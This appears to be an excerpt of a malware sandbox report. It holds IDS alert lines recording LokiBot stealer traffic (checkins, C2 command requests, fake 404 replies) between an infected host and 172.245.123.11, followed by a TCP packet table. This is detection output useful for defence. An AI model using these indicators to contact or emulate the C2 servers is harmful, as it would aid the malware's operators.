2025-01-07T11:03:40.576758+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.577698+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50124	TCP
2025-01-07T11:03:40.725262+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:40.725262+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:40.725262+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.226763+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.226763+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.232579+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50125	TCP
2025-01-07T11:03:41.427015+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:41.427015+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:41.427015+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:41.941183+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:41.941183+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:41.945929+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50126	TCP
2025-01-07T11:03:42.077854+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.077854+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.077854+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.582157+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.582157+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.586998+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50127	TCP
2025-01-07T11:03:42.718228+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:42.718228+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:42.718228+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.230772+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.230772+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.230824+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50128	TCP
2025-01-07T11:03:43.373897+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:43.373897+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:43.373897+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:43.883877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:43.883877+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:43.889105+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50129	TCP
2025-01-07T11:03:44.064476+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.064476+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.064476+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.565510+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.565510+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.570674+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50130	TCP
2025-01-07T11:03:44.703993+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:44.703993+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:44.703993+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.213830+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.213830+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.219660+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50131	TCP
2025-01-07T11:03:45.361356+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:45.361356+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:45.361356+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:45.873777+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:45.873777+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:45.873803+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50132	TCP
2025-01-07T11:03:46.021356+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.021356+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.021356+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.508415+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.508415+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.515917+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50133	TCP
2025-01-07T11:03:46.728055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:46.728055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:46.728055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.253639+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.253639+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.258469+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50134	TCP
2025-01-07T11:03:47.390462+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:47.390462+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:47.390462+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:47.940009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:47.940009+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:47.940076+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50135	TCP
2025-01-07T11:03:48.079188+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.079188+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.079188+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.599995+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.599995+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.604851+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50136	TCP
2025-01-07T11:03:48.750749+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:48.750749+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:48.750749+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.272186+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.272186+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.306405+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50137	TCP
2025-01-07T11:03:49.450939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:49.450939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:49.450939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:49.952988+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:49.952988+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:49.953044+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50138	TCP
2025-01-07T11:03:50.093929+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.093929+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.093929+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.591200+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.591200+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.596016+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50139	TCP
2025-01-07T11:03:50.740699+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:50.740699+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:50.740699+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.248033+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.248033+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.252940+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50140	TCP
2025-01-07T11:03:51.391659+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:51.391659+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:51.391659+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:51.922208+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:51.922208+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:51.922271+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50141	TCP
2025-01-07T11:03:52.063134+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.063134+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.063134+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.591519+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.591519+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.591821+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50142	TCP
2025-01-07T11:03:52.739569+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:52.739569+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:52.739569+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.254331+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.254331+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.254375+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50143	TCP
2025-01-07T11:03:53.390870+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:53.390870+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:53.390870+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:53.917456+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:53.917456+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:53.917994+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50144	TCP
2025-01-07T11:03:54.062572+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.062572+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.062572+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.583211+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.583211+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.588580+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50145	TCP
2025-01-07T11:03:54.718933+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:54.718933+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:54.718933+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.236735+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.236735+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.236778+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50146	TCP
2025-01-07T11:03:55.375592+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:55.375592+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:55.375592+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:55.875902+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:55.875902+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:55.875955+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50147	TCP
2025-01-07T11:03:56.016359+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.016359+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.016359+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.528237+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.528237+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.533027+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50148	TCP
2025-01-07T11:03:56.672622+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:56.672622+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:56.672622+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.196556+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.196556+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.201332+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50149	TCP
2025-01-07T11:03:57.344266+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:57.344266+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:57.344266+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:57.860803+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:57.860803+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:57.865551+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50150	TCP
2025-01-07T11:03:58.028337+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50151	172.245.123.11	80	TCP
2025-01-07T11:03:58.028337+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50151	172.245.123.11	80	TCP
2025-01-07T11:03:58.028337+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50151	172.245.123.11	80	TCP
2025-01-07T11:03:58.560538+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50151	172.245.123.11	80	TCP
2025-01-07T11:03:58.560538+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50151	172.245.123.11	80	TCP
2025-01-07T11:03:58.565391+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50151	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 11:01:56.702167988 CET	49704	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:56.707652092 CET	80	49704	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:56.707762003 CET	49704	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:56.709935904 CET	49704	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:56.715365887 CET	80	49704	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:56.715462923 CET	49704	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:56.720684052 CET	80	49704	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.233551025 CET	80	49704	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.233760118 CET	80	49704	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.233864069 CET	49704	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.233864069 CET	49704	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.239015102 CET	80	49704	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.370863914 CET	49705	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.375690937 CET	80	49705	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.375869989 CET	49705	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.377790928 CET	49705	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.382538080 CET	80	49705	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.382608891 CET	49705	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.387432098 CET	80	49705	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.878271103 CET	80	49705	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.878315926 CET	80	49705	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.878406048 CET	49705	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.878504992 CET	49705	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.883248091 CET	80	49705	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.932229042 CET	49706	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.937218904 CET	80	49706	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.937314034 CET	49706	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.939043045 CET	49706	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.943845987 CET	80	49706	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:57.943922997 CET	49706	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:57.948779106 CET	80	49706	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:58.457973003 CET	80	49706	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:58.458090067 CET	49706	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:58.458123922 CET	80	49706	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:58.458168030 CET	49706	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:58.462835073 CET	80	49706	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:58.628519058 CET	49707	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:01:58.628551006 CET	443	49707	194.15.112.248	192.168.2.5
Jan 7, 2025 11:01:58.628613949 CET	49707	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:01:58.633692026 CET	49708	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:58.639000893 CET	80	49708	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:58.639062881 CET	49708	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:58.641072035 CET	49708	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:58.646289110 CET	80	49708	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:58.646332979 CET	49708	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:58.648266077 CET	49707	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:01:58.648277044 CET	443	49707	194.15.112.248	192.168.2.5
Jan 7, 2025 11:01:58.651604891 CET	80	49708	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.167339087 CET	80	49708	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.167447090 CET	80	49708	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.167458057 CET	49708	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:59.167530060 CET	49708	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:59.172327995 CET	80	49708	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.314352989 CET	49709	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:59.319262028 CET	80	49709	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.319331884 CET	49709	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:59.321314096 CET	49709	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:59.326070070 CET	80	49709	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.326148033 CET	49709	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:01:59.330907106 CET	80	49709	172.245.123.11	192.168.2.5
Jan 7, 2025 11:01:59.755392075 CET	443	49707	194.15.112.248	192.168.2.5
Jan 7, 2025 11:01:59.755531073 CET	49707	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:01:59.801498890 CET	49707	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:01:59.801517010 CET	443	49707	194.15.112.248	192.168.2.5
Jan 7, 2025 11:01:59.801871061 CET	443	49707	194.15.112.248	192.168.2.5
